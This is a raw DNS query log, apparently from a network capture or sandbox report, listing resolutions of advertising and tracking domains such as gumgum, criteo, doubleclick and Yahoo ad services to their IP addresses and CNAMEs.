                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:36.038621902 CEST1.1.1.1192.168.2.40x4cabNo error (0)pb-am.a-mo.net163.5.194.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:36.038621902 CEST1.1.1.1192.168.2.40x4cabNo error (0)pb-am.a-mo.net163.5.194.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:36.038621902 CEST1.1.1.1192.168.2.40x4cabNo error (0)pb-am.a-mo.net163.5.194.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:36.038621902 CEST1.1.1.1192.168.2.40x4cabNo error (0)pb-am.a-mo.net163.5.194.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:36.038621902 CEST1.1.1.1192.168.2.40x4cabNo error (0)pb-am.a-mo.net163.5.194.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:36.038621902 CEST1.1.1.1192.168.2.40x4cabNo error (0)pb-am.a-mo.net163.5.194.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:36.038621902 CEST1.1.1.1192.168.2.40x4cabNo error (0)pb-am.a-mo.net163.5.194.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:36.699454069 CEST1.1.1.1192.168.2.40x3d0aNo error (0)rtb.gumgum.com54.194.165.207A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:36.699454069 CEST1.1.1.1192.168.2.40x3d0aNo error (0)rtb.gumgum.com108.128.218.239A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:36.699454069 CEST1.1.1.1192.168.2.40x3d0aNo error (0)rtb.gumgum.com52.16.119.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:36.699454069 CEST1.1.1.1192.168.2.40x3d0aNo error (0)rtb.gumgum.com52.214.64.207A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:36.699454069 CEST1.1.1.1192.168.2.40x3d0aNo error (0)rtb.gumgum.com52.16.88.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:36.699454069 CEST1.1.1.1192.168.2.40x3d0aNo error (0)rtb.gumgum.com34.253.0.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:36.699454069 CEST1.1.1.1192.168.2.40x3d0aNo error (0)rtb.gumgum.com52.210.231.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:36.699454069 CEST1.1.1.1192.168.2.40x3d0aNo error (0)rtb.gumgum.com54.171.108.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:36.703874111 CEST1.1.1.1192.168.2.40x10c9No error (0)sync.intentiq.com3.160.150.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:36.703874111 CEST1.1.1.1192.168.2.40x10c9No error (0)sync.intentiq.com3.160.150.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:36.703874111 CEST1.1.1.1192.168.2.40x10c9No error (0)sync.intentiq.com3.160.150.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:36.703874111 CEST1.1.1.1192.168.2.40x10c9No error (0)sync.intentiq.com3.160.150.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:37.493021011 CEST1.1.1.1192.168.2.40x1c85No error (0)yahoo-match.dotomi.combfp.global.dual.dotomi.weighted.com.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:37.494484901 CEST1.1.1.1192.168.2.40xe6a8No error (0)yahoo-match.dotomi.combfp.global.dual.dotomi.weighted.com.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:37.744724989 CEST1.1.1.1192.168.2.40x345eNo error (0)s.yimg.comedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:37.751105070 CEST1.1.1.1192.168.2.40xa7caNo error (0)s.yimg.comedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:37.751105070 CEST1.1.1.1192.168.2.40xa7caNo error (0)edge.gycpi.b.yahoodns.net87.248.119.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:37.751105070 CEST1.1.1.1192.168.2.40xa7caNo error (0)edge.gycpi.b.yahoodns.net87.248.119.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:37.791641951 CEST1.1.1.1192.168.2.40x115eNo error (0)sb.scorecardresearch.com18.245.60.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:37.791641951 CEST1.1.1.1192.168.2.40x115eNo error (0)sb.scorecardresearch.com18.245.60.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:37.791641951 CEST1.1.1.1192.168.2.40x115eNo error (0)sb.scorecardresearch.com18.245.60.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:37.791641951 CEST1.1.1.1192.168.2.40x115eNo error (0)sb.scorecardresearch.com18.245.60.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:37.813750982 CEST1.1.1.1192.168.2.40xfc5aNo error (0)ups.analytics.yahoo.comdcs-ups.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:37.813750982 CEST1.1.1.1192.168.2.40xfc5aNo error (0)dcs-ups.g03.yahoodns.netprod.ups-ats.aolp-ds-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:37.813750982 CEST1.1.1.1192.168.2.40xfc5aNo error (0)prod.ups-ats.aolp-ds-prd.aws.oath.cloudprod.ups-ats.eu-central-1.aolp-ds-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:37.813750982 CEST1.1.1.1192.168.2.40xfc5aNo error (0)prod.ups-ats.eu-central-1.aolp-ds-prd.aws.oath.cloudats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:37.813750982 CEST1.1.1.1192.168.2.40xfc5aNo error (0)ats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloud3.71.149.231A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:37.813750982 CEST1.1.1.1192.168.2.40xfc5aNo error (0)ats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloud3.75.62.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:37.813769102 CEST1.1.1.1192.168.2.40x7bdbNo error (0)ups.analytics.yahoo.comdcs-ups.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:37.813769102 CEST1.1.1.1192.168.2.40x7bdbNo error (0)dcs-ups.g03.yahoodns.netprod.ups-ats.aolp-ds-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:37.813769102 CEST1.1.1.1192.168.2.40x7bdbNo error (0)prod.ups-ats.aolp-ds-prd.aws.oath.cloudprod.ups-ats.eu-central-1.aolp-ds-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:37.813769102 CEST1.1.1.1192.168.2.40x7bdbNo error (0)prod.ups-ats.eu-central-1.aolp-ds-prd.aws.oath.cloudats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:37.816127062 CEST1.1.1.1192.168.2.40x2aaNo error (0)gps-aa.ybp.yahoo.comaws-bid-global.ybp.gysm.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:37.816127062 CEST1.1.1.1192.168.2.40x2aaNo error (0)aws-bid-global.ybp.gysm.yahoodns.net52.210.16.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:37.816127062 CEST1.1.1.1192.168.2.40x2aaNo error (0)aws-bid-global.ybp.gysm.yahoodns.net34.248.151.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:37.816127062 CEST1.1.1.1192.168.2.40x2aaNo error (0)aws-bid-global.ybp.gysm.yahoodns.net63.34.207.151A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:37.816127062 CEST1.1.1.1192.168.2.40x2aaNo error (0)aws-bid-global.ybp.gysm.yahoodns.net52.212.201.154A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:37.816127062 CEST1.1.1.1192.168.2.40x2aaNo error (0)aws-bid-global.ybp.gysm.yahoodns.net34.243.129.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:37.816127062 CEST1.1.1.1192.168.2.40x2aaNo error (0)aws-bid-global.ybp.gysm.yahoodns.net52.209.195.209A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:37.816127062 CEST1.1.1.1192.168.2.40x2aaNo error (0)aws-bid-global.ybp.gysm.yahoodns.net63.33.23.213A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:37.872956991 CEST1.1.1.1192.168.2.40x4d50No error (0)gps-aa.ybp.yahoo.comaws-bid-global.ybp.gysm.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:37.940345049 CEST1.1.1.1192.168.2.40x3beeNo error (0)securepubads.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:37.941448927 CEST1.1.1.1192.168.2.40xee2fNo error (0)securepubads.g.doubleclick.net142.250.185.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:38.010543108 CEST1.1.1.1192.168.2.40x6073No error (0)c1.adform.nettrack.adformnet.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:38.011482954 CEST1.1.1.1192.168.2.40x8ddcNo error (0)c1.adform.nettrack.adformnet.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:38.125155926 CEST1.1.1.1192.168.2.40x68aeNo error (0)tg.socdm.comtg.dr.socdm.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:38.135780096 CEST1.1.1.1192.168.2.40x82b7No error (0)creativecdn.com185.184.8.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:38.471204996 CEST1.1.1.1192.168.2.40xab11No error (0)ssum-sec.casalemedia.com172.64.151.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:38.471204996 CEST1.1.1.1192.168.2.40xab11No error (0)ssum-sec.casalemedia.com104.18.36.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:38.472258091 CEST1.1.1.1192.168.2.40x1d18No error (0)ssum-sec.casalemedia.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:38.642910004 CEST1.1.1.1192.168.2.40xbd21No error (0)cs.emxdgt.com52.57.90.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:38.642910004 CEST1.1.1.1192.168.2.40xbd21No error (0)cs.emxdgt.com18.192.157.52A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:38.642910004 CEST1.1.1.1192.168.2.40xbd21No error (0)cs.emxdgt.com18.153.135.118A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:38.642910004 CEST1.1.1.1192.168.2.40xbd21No error (0)cs.emxdgt.com18.184.123.209A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:38.867736101 CEST1.1.1.1192.168.2.40x948eNo error (0)usersync.gumgum.com34.247.233.198A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:38.867736101 CEST1.1.1.1192.168.2.40x948eNo error (0)usersync.gumgum.com34.247.205.196A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:38.867736101 CEST1.1.1.1192.168.2.40x948eNo error (0)usersync.gumgum.com52.210.15.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:39.584839106 CEST1.1.1.1192.168.2.40x9292No error (0)gum.criteo.comgum.nl3.vip.prod.criteo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:39.584839106 CEST1.1.1.1192.168.2.40x9292No error (0)gum.nl3.vip.prod.criteo.com178.250.1.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:39.584850073 CEST1.1.1.1192.168.2.40xdc79No error (0)gum.criteo.comgum.nl3.vip.prod.criteo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:39.863460064 CEST1.1.1.1192.168.2.40xf913No error (0)match.deepintent.comm.deepintent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:39.863460064 CEST1.1.1.1192.168.2.40xf913No error (0)m.deepintent.com38.91.45.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:39.863460064 CEST1.1.1.1192.168.2.40xf913No error (0)m.deepintent.com169.197.150.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:39.863460064 CEST1.1.1.1192.168.2.40xf913No error (0)m.deepintent.com169.197.150.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:39.863460064 CEST1.1.1.1192.168.2.40xf913No error (0)m.deepintent.com8.18.47.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:39.872200966 CEST1.1.1.1192.168.2.40x8c5eNo error (0)dsp.nrich.ai51.68.39.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:40.107907057 CEST1.1.1.1192.168.2.40xc94dNo error (0)i.clean.gg34.95.69.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:40.120210886 CEST1.1.1.1192.168.2.40x2fb6No error (0)pa.ybp.yahoo.comd9z32kqpe67oo.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:40.121120930 CEST1.1.1.1192.168.2.40x438fNo error (0)pa.ybp.yahoo.comd9z32kqpe67oo.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:40.121120930 CEST1.1.1.1192.168.2.40x438fNo error (0)d9z32kqpe67oo.cloudfront.net108.138.7.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:40.121120930 CEST1.1.1.1192.168.2.40x438fNo error (0)d9z32kqpe67oo.cloudfront.net108.138.7.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:40.121120930 CEST1.1.1.1192.168.2.40x438fNo error (0)d9z32kqpe67oo.cloudfront.net108.138.7.96A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:40.121120930 CEST1.1.1.1192.168.2.40x438fNo error (0)d9z32kqpe67oo.cloudfront.net108.138.7.80A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:40.246047974 CEST1.1.1.1192.168.2.40xcd15No error (0)securepubads.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:40.246692896 CEST1.1.1.1192.168.2.40xa2c0No error (0)securepubads.g.doubleclick.net142.250.186.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:40.260309935 CEST1.1.1.1192.168.2.40xdf5aNo error (0)pagead-googlehosted.l.google.com142.250.186.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:40.343885899 CEST1.1.1.1192.168.2.40x896eNo error (0)ups.analytics.yahoo.comdcs-ups.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:40.343885899 CEST1.1.1.1192.168.2.40x896eNo error (0)dcs-ups.g03.yahoodns.netprod.ups-ats.aolp-ds-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:40.343885899 CEST1.1.1.1192.168.2.40x896eNo error (0)prod.ups-ats.aolp-ds-prd.aws.oath.cloudprod.ups-ats.eu-central-1.aolp-ds-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:40.343885899 CEST1.1.1.1192.168.2.40x896eNo error (0)prod.ups-ats.eu-central-1.aolp-ds-prd.aws.oath.cloudats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:40.343885899 CEST1.1.1.1192.168.2.40x896eNo error (0)ats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloud3.75.62.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:40.343885899 CEST1.1.1.1192.168.2.40x896eNo error (0)ats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloud3.71.149.231A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:40.344546080 CEST1.1.1.1192.168.2.40x348dNo error (0)ups.analytics.yahoo.comdcs-ups.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:40.344546080 CEST1.1.1.1192.168.2.40x348dNo error (0)dcs-ups.g03.yahoodns.netprod.ups-ats.aolp-ds-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:40.344546080 CEST1.1.1.1192.168.2.40x348dNo error (0)prod.ups-ats.aolp-ds-prd.aws.oath.cloudprod.ups-ats.eu-central-1.aolp-ds-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:40.344546080 CEST1.1.1.1192.168.2.40x348dNo error (0)prod.ups-ats.eu-central-1.aolp-ds-prd.aws.oath.cloudats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:40.345262051 CEST1.1.1.1192.168.2.40x27d0No error (0)sync.intentiq.com3.160.150.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:40.345262051 CEST1.1.1.1192.168.2.40x27d0No error (0)sync.intentiq.com3.160.150.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:40.345262051 CEST1.1.1.1192.168.2.40x27d0No error (0)sync.intentiq.com3.160.150.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:40.345262051 CEST1.1.1.1192.168.2.40x27d0No error (0)sync.intentiq.com3.160.150.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:40.359379053 CEST1.1.1.1192.168.2.40xa26bNo error (0)s.yimg.comedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:40.359379053 CEST1.1.1.1192.168.2.40xa26bNo error (0)edge.gycpi.b.yahoodns.net87.248.119.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:40.359379053 CEST1.1.1.1192.168.2.40xa26bNo error (0)edge.gycpi.b.yahoodns.net87.248.119.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:40.359868050 CEST1.1.1.1192.168.2.40xbd44No error (0)s.yimg.comedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:40.876130104 CEST1.1.1.1192.168.2.40x6fc0No error (0)dsum-sec.casalemedia.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:40.876485109 CEST1.1.1.1192.168.2.40xc8daNo error (0)dsum-sec.casalemedia.com104.18.36.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:40.876485109 CEST1.1.1.1192.168.2.40xc8daNo error (0)dsum-sec.casalemedia.com172.64.151.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:40.877413034 CEST1.1.1.1192.168.2.40xb459No error (0)match.sharethrough.commatch-eu-central-1-ecs.sharethrough.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:40.877413034 CEST1.1.1.1192.168.2.40xb459No error (0)match-eu-central-1-ecs.sharethrough.com18.184.119.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:40.877687931 CEST1.1.1.1192.168.2.40xdb81No error (0)dsum-sec.casalemedia.com172.64.151.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:40.877687931 CEST1.1.1.1192.168.2.40xdb81No error (0)dsum-sec.casalemedia.com104.18.36.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:40.878020048 CEST1.1.1.1192.168.2.40xbe7aNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:40.878020048 CEST1.1.1.1192.168.2.40xbe7aNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:40.878295898 CEST1.1.1.1192.168.2.40x31e2No error (0)match.sharethrough.commatch-eu-central-1-ecs.sharethrough.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:40.878691912 CEST1.1.1.1192.168.2.40xaf08No error (0)dsum-sec.casalemedia.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:40.895914078 CEST1.1.1.1192.168.2.40x8d74No error (0)bh.contextweb.comam1-bh.contextweb.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:40.895914078 CEST1.1.1.1192.168.2.40x8d74No error (0)am1-bh.contextweb.comam1-direct-bgp.contextweb.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:40.895914078 CEST1.1.1.1192.168.2.40x8d74No error (0)am1-direct-bgp.contextweb.com208.93.169.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:40.895970106 CEST1.1.1.1192.168.2.40x6cNo error (0)bh.contextweb.comam1-bh.contextweb.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:40.895970106 CEST1.1.1.1192.168.2.40x6cNo error (0)am1-bh.contextweb.comam1-direct-bgp.contextweb.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:40.982553005 CEST1.1.1.1192.168.2.40x3a2No error (0)match.deepintent.comm.deepintent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:40.982553005 CEST1.1.1.1192.168.2.40x3a2No error (0)m.deepintent.com169.197.150.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:40.982553005 CEST1.1.1.1192.168.2.40x3a2No error (0)m.deepintent.com169.197.150.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:40.982553005 CEST1.1.1.1192.168.2.40x3a2No error (0)m.deepintent.com8.18.47.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:40.982553005 CEST1.1.1.1192.168.2.40x3a2No error (0)m.deepintent.com38.91.45.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:41.196991920 CEST1.1.1.1192.168.2.40x60efNo error (0)ssbsync.smartadserver.comssbsync-geo.smartadserver.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:41.196991920 CEST1.1.1.1192.168.2.40x60efNo error (0)ssbsync-geo.smartadserver.comusersync-geo-global.usersync-prod-sas.akadns.netCNAME (Canonical name)IN (0x0001)false
